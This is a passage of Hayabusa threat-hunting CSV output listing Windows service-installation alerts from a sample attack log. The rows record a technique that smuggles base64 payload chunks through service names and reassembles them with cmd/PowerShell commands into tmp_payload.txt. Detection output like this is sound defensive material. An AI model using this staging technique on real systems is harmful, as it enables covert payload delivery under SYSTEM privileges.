start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:18:31.297 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: AtICAkUGVyY2VudENvbXBsZXRlJSBDb21wbGV0ZSIgLXN0YXR1cyAiQ2FsY3VsYXRpbmcgRVBTIGZvciBDb21wdXRlcjogJENvbXB1dGVyIiAtcGVyY2VudENvbXBsZXRlICRQZXJjZW50Q29tcGxl | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service 
""seg136"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:18:31.297 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: AtICAkUGVyY2VudENvbXBsZXRlJSBDb21wbGV0ZSIgLXN0YXR1cyAiQ2FsY3VsYXRpbmcgRVBTIGZvciBDb21wdXRlcjogJENvbXB1dGVyIiAtcGVyY2VudENvbXBsZXRlICRQZXJjZW50Q29tcGxl | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg136"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:18:32.740 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: dGUNCiAgICAgICAgfQ0KDQogICAgICAgIFdyaXRlLUxvZyAkSU5GT19MT0cgIkV2ZW50IExvZyBFU1AgUmVwb3J0IENhbGN1bGF0aW9ucyBDb21wbGV0ZSINCg0KICAgICAgICBSZXR1cm4gJFJlcG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg137"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:18:32.740 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: dGUNCiAgICAgICAgfQ0KDQogICAgICAgIFdyaXRlLUxvZyAkSU5GT19MT0cgIkV2ZW50IExvZyBFU1AgUmVwb3J0IENhbGN1bGF0aW9ucyBDb21wbGV0ZSINCg0KICAgICAgICBSZXR1cm4gJFJlcG | Path: 
c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg137"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:18:32.740 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: dGUNCiAgICAgICAgfQ0KDQogICAgICAgIFdyaXRlLUxvZyAkSU5GT19MT0cgIkV2ZW50IExvZyBFU1AgUmVwb3J0IENhbGN1bGF0aW9ucyBDb21wbGV0ZSINCg0KICAgICAgICBSZXR1cm4gJFJlcG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg137"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:18:34.190 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: 9ydA0KICAgICANCiAgICB9DQoNCiAgICBjYXRjaCB7DQoNCiAgICAgICAgV3JpdGUtTG9nICRFUlJPUl9MT0cgIlVuYWJsZSB0byBDcmVhdGUgTG9nIFJlcG9ydCINCg0KICAgICAgICBXcml0ZS1M | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg138"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:18:34.190 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: 
9ydA0KICAgICANCiAgICB9DQoNCiAgICBjYXRjaCB7DQoNCiAgICAgICAgV3JpdGUtTG9nICRFUlJPUl9MT0cgIlVuYWJsZSB0byBDcmVhdGUgTG9nIFJlcG9ydCINCg0KICAgICAgICBXcml0ZS1M | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg138"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:18:34.190 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: 9ydA0KICAgICANCiAgICB9DQoNCiAgICBjYXRjaCB7DQoNCiAgICAgICAgV3JpdGUtTG9nICRFUlJPUl9MT0cgIlVuYWJsZSB0byBDcmVhdGUgTG9nIFJlcG9ydCINCg0KICAgICAgICBXcml0ZS1M | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg138"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:18:35.638 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: b2cgJEVSUk9SX0xPRyAkRXJyb3JbMF0NCg0KICAgICAgICAkRXJyb3JMaW5lTnVtYmVyID0gJEVycm9yWzBdLkludm9jYXRpb25JbmZvLnNjcmlwdGxpbmVudW1iZXINCg0KICAgICAgICBXcml0ZS | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg139"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:18:35.638 
+09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: b2cgJEVSUk9SX0xPRyAkRXJyb3JbMF0NCg0KICAgICAgICAkRXJyb3JMaW5lTnVtYmVyID0gJEVycm9yWzBdLkludm9jYXRpb25JbmZvLnNjcmlwdGxpbmVudW1iZXINCg0KICAgICAgICBXcml0ZS | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg139"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:18:35.638 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: b2cgJEVSUk9SX0xPRyAkRXJyb3JbMF0NCg0KICAgICAgICAkRXJyb3JMaW5lTnVtYmVyID0gJEVycm9yWzBdLkludm9jYXRpb25JbmZvLnNjcmlwdGxpbmVudW1iZXINCg0KICAgICAgICBXcml0ZS | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg139"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:18:37.081 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: 1Mb2cgJEVSUk9SX0xPRyAiQ2F1Z2h0IG9uIGxpbmUgbnVtYmVyOiAkRXJyb3JMaW5lTnVtYmVyIg0KDQogICAgICAgIGV4aXQNCiAgICB9DQp9DQoNCg0KIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg140"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload 
deployed via service - Tchopper.evtx" 2021-11-03 17:18:37.081 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: 1Mb2cgJEVSUk9SX0xPRyAiQ2F1Z2h0IG9uIGxpbmUgbnVtYmVyOiAkRXJyb3JMaW5lTnVtYmVyIg0KDQogICAgICAgIGV4aXQNCiAgICB9DQp9DQoNCg0KIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg140"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:18:37.081 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: 1Mb2cgJEVSUk9SX0xPRyAiQ2F1Z2h0IG9uIGxpbmUgbnVtYmVyOiAkRXJyb3JMaW5lTnVtYmVyIg0KDQogICAgICAgIGV4aXQNCiAgICB9DQp9DQoNCg0KIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg140"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:18:38.534 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIw0KI0Z1bmN0aW9uIHdpbGwgZ2VuZXJhdGUgb3V0cHV0IGluZm8gZm | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg141"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand 
start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:18:38.534 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIw0KI0Z1bmN0aW9uIHdpbGwgZ2VuZXJhdGUgb3V0cHV0IGluZm8gZm | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg141"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:18:38.534 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIw0KI0Z1bmN0aW9uIHdpbGwgZ2VuZXJhdGUgb3V0cHV0IGluZm8gZm | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg141"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:18:39.987 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: 9yIHRoZSBnaXZlbiBsb2cuIEF2ZywgU3VnZ2VzdGVkIFByb2ZpbGUsIGV0Yy4uLg0KDQojQHBhcmFtICRMb2dOYW1lICAgICAgICAgICAgLT4gIFRoZSBFdmVudCBMb2cNCiNAcGFyYW0gJEF2Z0V2 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg142"" | select -Expand DisplayName |out-file -append 
tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:18:39.987 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: 9yIHRoZSBnaXZlbiBsb2cuIEF2ZywgU3VnZ2VzdGVkIFByb2ZpbGUsIGV0Yy4uLg0KDQojQHBhcmFtICRMb2dOYW1lICAgICAgICAgICAgLT4gIFRoZSBFdmVudCBMb2cNCiNAcGFyYW0gJEF2Z0V2 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg142"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:18:39.987 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: 9yIHRoZSBnaXZlbiBsb2cuIEF2ZywgU3VnZ2VzdGVkIFByb2ZpbGUsIGV0Yy4uLg0KDQojQHBhcmFtICRMb2dOYW1lICAgICAgICAgICAgLT4gIFRoZSBFdmVudCBMb2cNCiNAcGFyYW0gJEF2Z0V2 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg142"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:18:41.440 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: ZW50c1BlclNlY29uZCAtPiAgVGhlIGF2ZyBldmVudHMgcGVyIHNlY29uZCBmb3IgdGhlIGdpdmVuIGxvZw0KI0BwYXJhbSAkVG90YWxMb2dFdmVudHMgICAgIC0+ICBUaGUgdG90YWwgIyBvZiBldm | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service 
""seg143"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:18:41.440 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ZW50c1BlclNlY29uZCAtPiAgVGhlIGF2ZyBldmVudHMgcGVyIHNlY29uZCBmb3IgdGhlIGdpdmVuIGxvZw0KI0BwYXJhbSAkVG90YWxMb2dFdmVudHMgICAgIC0+ICBUaGUgdG90YWwgIyBvZiBldm | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg143"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:18:41.440 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ZW50c1BlclNlY29uZCAtPiAgVGhlIGF2ZyBldmVudHMgcGVyIHNlY29uZCBmb3IgdGhlIGdpdmVuIGxvZw0KI0BwYXJhbSAkVG90YWxMb2dFdmVudHMgICAgIC0+ICBUaGUgdG90YWwgIyBvZiBldm | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg143"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:18:42.889 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: VudHMgZm9yIHRoZSBnaXZlbiBsb2cNCg0KIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj | Path: 
c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg144"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:18:42.889 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: VudHMgZm9yIHRoZSBnaXZlbiBsb2cNCg0KIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg144"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:18:42.889 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: VudHMgZm9yIHRoZSBnaXZlbiBsb2cNCg0KIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg144"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:18:44.332 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: 
IyMjIyMjIyMjIw0KDQpmdW5jdGlvbiBFeHBvcnQtTG9nUmVwb3J0IHsgcGFyYW0oJENvbXB1dGVybGlzdCwgJENvbXB1dGVyQ291bnQsICRDb21wdXRlckxpc3RUeXBlKSAgICANCg0KICAgIHRyeS | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg145"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:18:44.332 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: IyMjIyMjIyMjIw0KDQpmdW5jdGlvbiBFeHBvcnQtTG9nUmVwb3J0IHsgcGFyYW0oJENvbXB1dGVybGlzdCwgJENvbXB1dGVyQ291bnQsICRDb21wdXRlckxpc3RUeXBlKSAgICANCg0KICAgIHRyeS | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg145"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:18:44.332 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: IyMjIyMjIyMjIw0KDQpmdW5jdGlvbiBFeHBvcnQtTG9nUmVwb3J0IHsgcGFyYW0oJENvbXB1dGVybGlzdCwgJENvbXB1dGVyQ291bnQsICRDb21wdXRlckxpc3RUeXBlKSAgICANCg0KICAgIHRyeS | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg145"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:18:45.778 
+09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: B7DQogICAgICAgIA0KICAgICAgICAkUmVwb3J0ID0gQ3JlYXRlLUxvZ1JlcG9ydCAkQ29tcHV0ZXJsaXN0ICRDb21wdXRlckNvdW50ICRDb21wdXRlckxpc3RUeXBlDQoNCiAgICAgICAgJE91dHB1 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg146"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:18:45.778 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: B7DQogICAgICAgIA0KICAgICAgICAkUmVwb3J0ID0gQ3JlYXRlLUxvZ1JlcG9ydCAkQ29tcHV0ZXJsaXN0ICRDb21wdXRlckNvdW50ICRDb21wdXRlckxpc3RUeXBlDQoNCiAgICAgICAgJE91dHB1 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg146"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:18:45.778 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: B7DQogICAgICAgIA0KICAgICAgICAkUmVwb3J0ID0gQ3JlYXRlLUxvZ1JlcG9ydCAkQ29tcHV0ZXJsaXN0ICRDb21wdXRlckNvdW50ICRDb21wdXRlckxpc3RUeXBlDQoNCiAgICAgICAgJE91dHB1 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg146"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload 
deployed via service - Tchopper.evtx" 2021-11-03 17:18:47.225 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: dFRhYmxlID0gZm9yZWFjaCAoJGJveCBpbiAkUmVwb3J0LkdldEVudW1lcmF0b3IoKSkgeyANCg0KICAgICAgICAgICAgTmV3LU9iamVjdCBQU09iamVjdCAtUHJvcGVydHkgKFtvcmRlcmVkXUB7DQ | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg147"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:18:47.225 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: dFRhYmxlID0gZm9yZWFjaCAoJGJveCBpbiAkUmVwb3J0LkdldEVudW1lcmF0b3IoKSkgeyANCg0KICAgICAgICAgICAgTmV3LU9iamVjdCBQU09iamVjdCAtUHJvcGVydHkgKFtvcmRlcmVkXUB7DQ | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg147"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:18:47.225 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: dFRhYmxlID0gZm9yZWFjaCAoJGJveCBpbiAkUmVwb3J0LkdldEVudW1lcmF0b3IoKSkgeyANCg0KICAgICAgICAgICAgTmV3LU9iamVjdCBQU09iamVjdCAtUHJvcGVydHkgKFtvcmRlcmVkXUB7DQ | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg147"" | select -Expand DisplayName |out-file -append 
tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:18:48.663 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: ogICAgICAgICAgICAiU2VydmVyIiA9ICRib3guTmFtZTsgIk9TIFZlcnNpb24iID0gJGJveC5WYWx1ZS5PU1ZlcnNpb247IA0KICAgICAgICAgICAgIkFwcGxpY2F0aW9uIChFUFMpIiA9ICRib3gu | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg148"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:18:48.663 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: 